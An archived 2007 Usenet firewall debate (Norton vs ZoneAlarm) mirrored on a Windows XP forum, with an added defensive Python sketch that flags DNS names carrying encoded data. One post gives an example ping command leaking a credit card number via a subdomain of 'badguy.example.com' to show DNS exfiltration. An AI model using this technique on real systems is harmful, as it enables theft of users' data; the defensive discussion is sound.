A Windows XP help forum. PCbanter


Norton vs Zone Alarm firewalls



 
 
  #61  
Old November 28th 07, 05:59 PM posted to comp.security.firewalls,microsoft.public.windowsxp.basics,microsoft.public.windowsxp.general
Ansgar -59cobalt- Wiechers
external usenet poster
 
Posts: 14
Default Norton vs Zone Alarm firewalls

In comp.security.firewalls RalfG wrote:
"Gerald Vogt" wrote:
RalfG wrote:
firewall may have the ability to block -any- application from
sending email without explicit approval. Monitoring outbound traffic
also entails


Still, any application can send email without explicit approval if it
really wants to. That's the point which is usually not mentioned.


In your preferred setup nothing prevents emails from being sent. With
an appropriate firewall the firewall can block emails from being sent
without user intervention.


The user's mail client is allowed to send mail. %OTHER_PROGRAM% utilizes
the user's mail client to send mail. How does the firewall prevent that?

No, trying to intercept IPC and then let the user decide is not an
option, because that kind of decision is *way* over a normal user's
head.

differentiating the legitimate processes from suspicious ones or
spoofs. All firewalls are not equal, but if the firewall is doing
the job well it's not enough for a process to pretend to be
"iexplore.exe" in order to pass the firewall, it has to be
c:\program files\internet explorer\iexplore.exe, with additional
identifying information, be it a specific version number, CRC etc.
etc..


And what keeps the malware from using the original IE to send out its
data?


In your setup nothing, with many firewalls nothing as well, however
there are firewalls which do monitor all processes that try to start
other processes.


There's exactly no need at all to do that. Software Restriction Policies
already allow you to define which programs may or may not be executed.

Viruses aren't smart, they're all constrained to operating within
specific program parameters. Some are more cleverly written than
others but the vast majority have already been beaten.


Yes. But that's all. A single little bit cleverer malware sends out
your credit card number through DNS. Your firewall does not help. It
does not recognize it. You still need more effective means to protect
your data which no security suite can provide.


You're basing your argument on a hypothetical malware and deficient AV
and firewall apps. Sorry, that strawman logic doesn't work. One of the
reasons for monitoring outbound traffic is precisely to stop
unrecognized processes from making connections, either to the internet
or to other nodes on a LAN.


Instead of restricting the communication of unrecognized processes you
want to prevent unrecognized processes from being started in the first
place. That's what AV software and SRP do.

Firewall X might do this better than Firewall Y, Firewall Z might not
do it at all. Y may not be as good a firewall as X but it is still
better than Z, and even Z is better than nothing at all.


Wrong, because this neglects the existence of exploitable bugs and
design flaws in the firewall software as well as the possibility of
intelligent malware.

Anyway this thread seems to be missing the point. It's analogous to
saying that we shouldn't bother using crosswalks or crossing at the
lights because it is always possible that some idiot driver might
ignore the signals and run us down anyway. One side (anti-security)
says avoid the problem by never crossing a street, the other side
(pro-security) says use due caution and


No. That is the wrong analogy. No one ever said you can never cross
the street.

You say you have to install security firewall, i.e. you have to cross
the street with the security installed, i.e. at the lights. You must
not cross the street at any other place (i.e. without security)
because you will be killed, i.e. it is impossible to cross the
street at any other place except at the lights.


I never suggested certainty. The whole computer security issue is
about probabilities.


No. Computer security is about reliability. Which may very well be based
on probabilities, but only if you have some hard numbers. Which numbers
are the probabilities you're talking about based on?

There is a greater probability of being hit by traffic if you don't
use the crosswalks just as there is a greater probability of falling
victim to malware if you don't use security software.


Pointless, unless you are able to quantify that.

cu
59cobalt
--
"If a software developer ever believes a rootkit is a necessary part of
their architecture they should go back and re-architect their solution."
--Mark Russinovich
  #62  
Old November 28th 07, 11:31 PM posted to comp.security.firewalls,microsoft.public.windowsxp.basics,microsoft.public.windowsxp.general
Gerald Vogt
external usenet poster
 
Posts: 32
Default Norton vs Zone Alarm firewalls

RalfG wrote:
"Gerald Vogt" wrote in message
...
RalfG wrote:
It doesn't need to be a virus. I did encounter that one time when
accessing a web page unexpectedly triggered OE and the firewall blocked
it. A

Which means again you went to that web page to start with. It was your
action which brought you there.


Normal usage of the computer for browsing, yes. Staying off of the internet
is almost certainly the best way to avoid trouble but that's just a tad self
defeating.


I'll never understand why many people also jump to the "stay off the
internet". No one said so. It is your conclusion that it is inevitable
to come to such "bad" web pages. And that is simply not true. You can
browse the internet and still avoid most of those pages.

firewall may have the ability to block -any- application from sending
email without explicit approval. Monitoring outbound traffic also entails

Still, any application can send email without explicit approval if it
really wants to. That's the point which is usually not mentioned.


In your preferred setup nothing prevents emails from being sent. With an
appropriate firewall
the firewall can block emails from being sent without user intervention.


Yes. The firewall may be able to block emails from being sent with OE
without user intervention.

It cannot prevent some malware from putting some mails into the outbox
which are sent out the next time the user sends something out.

And it cannot prevent some malware sending out e-mail or other data
bypassing the firewall. If you want to get something out you'll get it
out even with the firewall in place.

differentiating the legitimate processes from suspicious ones or spoofs.
All firewalls are not equal, but if the firewall is doing the job well
it's not enough for a process to pretend to be "iexplore.exe" in order to
pass the firewall, it has to be c:\program files\internet
explorer\iexplore.exe, with additional identifying information, be it a
specific version number, CRC etc. etc..

And what keeps the malware from using the original IE to send out its data?


In your setup nothing, with many firewalls nothing as well, however there
are firewalls
which do monitor all processes that try to start other processes.


Many people have a browser running at all times. You don't need to start
a process. You just have to make the other process do what you want.
That's not so awfully difficult.

Viruses aren't smart, they're all constrained to operating within
specific program parameters. Some are more cleverly written than others
but the vast majority have already been beaten.

Yes. But that's all. A single little bit cleverer malware sends out your
credit card number through DNS. Your firewall does not help. It does not
recognize it. You still need more effective means to protect your data
which no security suite can provide.


You're basing your argument on a hypothetical malware and deficient AV and
firewall apps. Sorry, that strawman logic doesn't work. One of the reasons
for monitoring outbound traffic is precisely to stop unrecognized processes
from making connections, either to the internet or to other nodes on a LAN.


Again. IE, OE, and other installed applications on your computer are not
unrecognized processes. ping for example is a standard application. You
can simply enter

ping VISA12341234123412340108RalfGGG.badguy.example.com

And here goes your credit card... You'll never notice. At the same time
you run another process which you let get caught by the firewall to make
the user think it is all safe and he can continue...

I don't have to use unrecognized processes to send data.

And even "unrecognized processes" can trick the firewall.


Firewall X might do this better than Firewall Y, Firewall Z might not do it
at all. Y may not be as good a firewall as X but it is still better than Z,
and even Z is better than nothing at all.


Good at blocking software you have installed and use to communicate: yes.

Good at blocking malware effectively: no.

You say you have to install security firewall, i.e. you have to cross the
street with the security installed, i.e. at the lights. You must not cross
the street at any other place (i.e. without security) because you will be
killed, i.e. it is impossible to cross the street at any other place
except at the lights.


I never suggested certainty. The whole computer security issue is about
probabilities. There is a greater probability of being hit by traffic if you
don't use the crosswalks just as there is a greater probability of falling
victim to malware if you don't use security software.


This is just plain wrong. I am far more safe if I open my eyes and make
sure that it is safe to cross the street than to rely on traffic lights.

Thus, why would you tell everybody to use the lights and it is
absolutely essential to use the lights when there is a far more
effective and safer method?

you from being killed if all you do is to cross the street at the lights
and never looking to the right or left. If you just start to walk when
it's green you'll be eventually killed. There are a lot of nice drivers
who stop at their red light but eventually you'll meet the one who does
not.

The alternative is not to rely on the lights. Don't trust the lights. The
effective security is to switch on your brain and protect yourself looking
to the left and right and making sure yourself it is safe to cross the
street at this time and at this place. This effectively


You just described using due caution.


Which is far more effective security.

That's the correct analogy if you want to use the "lights". No one ever
said you cannot cross the street. On the contrary. (I already know how you
will now adjust your analogy but...)


There's no need to adjust my analogy. You haven't yet made a compelling
argument in favour of your position.. and I doubt that accident statistics
will support your contentions either.


You started that analogy. I did not adjust it. You described it wrong.

The goal was to cross the street.

You use security software as an aid just like traffic lights are an aid for
that.

I say you don't need the lights. You don't need the security software.

It is useless to discuss your analogy if you want the analogy to be that
not using security software equals not crossing the street. Because you
mix the aim with the tool which is supposed to help.

cross with the lights. I use a firewall mainly to keep
unauthorised -people- out of my PC, AV and AS software to keep out or
kill malicious software.

Anything that comes on to your computer first of all got there because of
your action, i.e. your "invitation". But none of the security suites
really deals with this fact nor


Blaming the victim?


Yes. If a person refuses to learn about security. If a person thinks it
only has to install a software suite to protect your computer. If a
person thinks with security suite in place everything is done which one
can possibly do to have security. If someone wants to dig in the dirt
he'll get dirty. If you are concerned about the security of your
computer and data you'll learn rules how to keep secure.

Gerald
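
A defender-side sketch of the point made in the post above, added here and not part of the original thread: because the lookup in the ping example comes from a permitted binary, the check inspects the queried name instead of the process. The log format, the thresholds and every sample name except the post's own hostname are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample of a resolver query log: (process that asked, name queried).
# The first ping.exe entry is the hostname from the post; the rest are invented.
SAMPLE_QUERIES = [
    ("iexplore.exe", "www.example.com"),
    ("ping.exe", "VISA12341234123412340108RalfGGG.badguy.example.com"),
    ("msimn.exe", "mail.example.net"),
    ("ping.exe", "x7f3k9q2m5z8w1c4v6b0n3j5h7g9d2s4.badguy.example.com"),
    ("iexplore.exe", "images.example.com"),
]

# Assumed thresholds; tune them against a baseline of your own traffic.
MAX_LABEL_LEN = 24    # ordinary host labels are short
MIN_DIGIT_RUN = 13    # payment card numbers are 13 to 19 digits long
MAX_DATA_LABELS = 1   # distinct data-like labels tolerated per parent domain
DIGIT_RUN = re.compile(r"\d{%d,}" % MIN_DIGIT_RUN)

def label_findings(label):
    """Return the reasons a single DNS label looks like it carries data."""
    reasons = []
    if len(label) > MAX_LABEL_LEN:
        reasons.append("long-label")
    if DIGIT_RUN.search(label):
        reasons.append("digit-run")
    return reasons

def flag_queries(queries):
    """Flag queries whose leftmost label looks like encoded data.

    Returns (process, name, reasons) tuples. The process name is reported
    but never used to decide, since a trusted binary such as ping.exe can
    be the one that issues the lookup.
    """
    flagged = []
    for process, name in queries:
        reasons = label_findings(name.split(".")[0])
        if reasons:
            flagged.append((process, name, reasons))
    return flagged

def noisy_parents(queries):
    """Parent domains that received more than MAX_DATA_LABELS distinct flagged labels."""
    children = defaultdict(set)
    for _, name, _ in flag_queries(queries):
        first, _, parent = name.lower().partition(".")
        children[parent].add(first)
    return sorted(p for p, c in children.items() if len(c) > MAX_DATA_LABELS)

if __name__ == "__main__":
    for process, name, reasons in flag_queries(SAMPLE_QUERIES):
        print(process, name, ",".join(reasons))
    print("parents:", noisy_parents(SAMPLE_QUERIES))
```

Treating the parent as everything after the first label is a simplification; a production check would use a public suffix list and a time window.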
  #63  
Old December 1st 07, 04:23 AM posted to comp.security.firewalls,microsoft.public.windowsxp.basics,microsoft.public.windowsxp.general
Victek
external usenet poster
 
Posts: 30
Default Norton vs Zone Alarm firewalls

My Zone Alarm Pro firewall subscription expires in a few days and I
recently bought a Norton Internet Security 2008 package that contains a
firewall.
I currently have the Norton firewall turned off and just use the Zone
Alarm Pro firewall.
I don't use the Win XP firewall because I heard that it's not a good idea
to have several firewalls on at the same time.
We get internet through a Belkin pre-N wireless router that is supposed to
have some sort of firewall built in and that one is turned on.
My computer connects to the router with an ethernet cable and my son's
computer uses a Belkin N usb wireless adapter. They both have the same
current setup I describe regarding firewalls.
Can anyone please advise on whether the Zone Alarm Pro firewall is any
better than the Norton firewall in my situation?
Should I renew the Zone Alarm Pro subscription or uninstall it when it
expires and turn on the Norton firewall?
Thanks for any advice.


Specifically with regard to your question I think an important part of the
answer is which firewall software you are more comfortable with. By that I
mean which product's interface and features make the most sense? Firewalls
have many features which can often be configured in multiple ways. The
more you understand the product the more likely you will configure it
optimally and get the best protection. Zone Alarm is a good choice if you
want to be involved. On the other hand, some folks prefer security software
that requires as little user interaction as possible and the Norton products
are a good choice in that case because by default they handle a lot of the
decision making. I'm not familiar with the firewall included in NIS 2008 so
I can't comment specifically on it, but it did get a very good review at
pcmag.com. Hope this helps.

  #64  
Old December 1st 07, 05:40 AM posted to comp.security.firewalls,microsoft.public.windowsxp.basics,microsoft.public.windowsxp.general
Sam Hobbs
external usenet poster
 
Posts: 217
Default Norton vs Zone Alarm firewalls

"Kayman" wrote in message
...

It is important that administrators follow the rule of least privilege.


Definitely.



  #65  
Old December 1st 07, 06:02 AM posted to comp.security.firewalls,microsoft.public.windowsxp.basics,microsoft.public.windowsxp.general
Sam Hobbs
external usenet poster
 
Posts: 217
Default Norton vs Zone Alarm firewalls

"Ansgar -59cobalt- Wiechers" wrote in message
...
In comp.security.firewalls RalfG wrote:
"Gerald Vogt" wrote:
RalfG wrote:


One of the
reasons for monitoring outbound traffic is precisely to stop
unrecognized processes from making connections, either to the internet
or to other nodes on a LAN.


Instead of restricting the communication of unrecognized processes you
want to prevent unrecognized processes from being started in the first
place. That's what AV software and SRP do.



I think you are both correct. Doing both makes it more difficult for
malicious software to work. Doing one without the other can be a
vulnerability.


Note: I am sorry that I had to add the other newsgroups back into the list
of recipients of this, but I am unable to send to just
comp.security.firewalls.



  #66  
Old December 1st 07, 06:23 AM posted to comp.security.firewalls,microsoft.public.windowsxp.basics,microsoft.public.windowsxp.general
Sam Hobbs
external usenet poster
 
Posts: 217
Default Norton vs Zone Alarm firewalls

"Gerald Vogt" wrote in message
...

It cannot prevent some malware from putting some mails into the outbox which
are sent out the next time the user sends something out.


Outlook Express won't send anything without some user involvement. In the
past, it was possible for unauthorized software to spread itself in the
manner you describe but now Microsoft does not allow it. Certainly there is
potential for sophisticated software to bypass such things, but if it were
as easy as you say, we would sure hear about it.

Windows, at least prior to Vista, is surprisingly vulnerable to software
that is allowed to execute in a system. It is so vulnerable that it is
nearly impossible to make a system totally safe from software running in a
system. There are many ways for software to inject a DLL or other code into
another process. Good antivirus software will catch most of those, and
detection of injection is a critical way to catch most malicious software
and that is how antivirus software might also catch many valid utility
software.

Regardless, use of OE in the manner you describe is not as easy as you
indicate.



 




All times are GMT +1.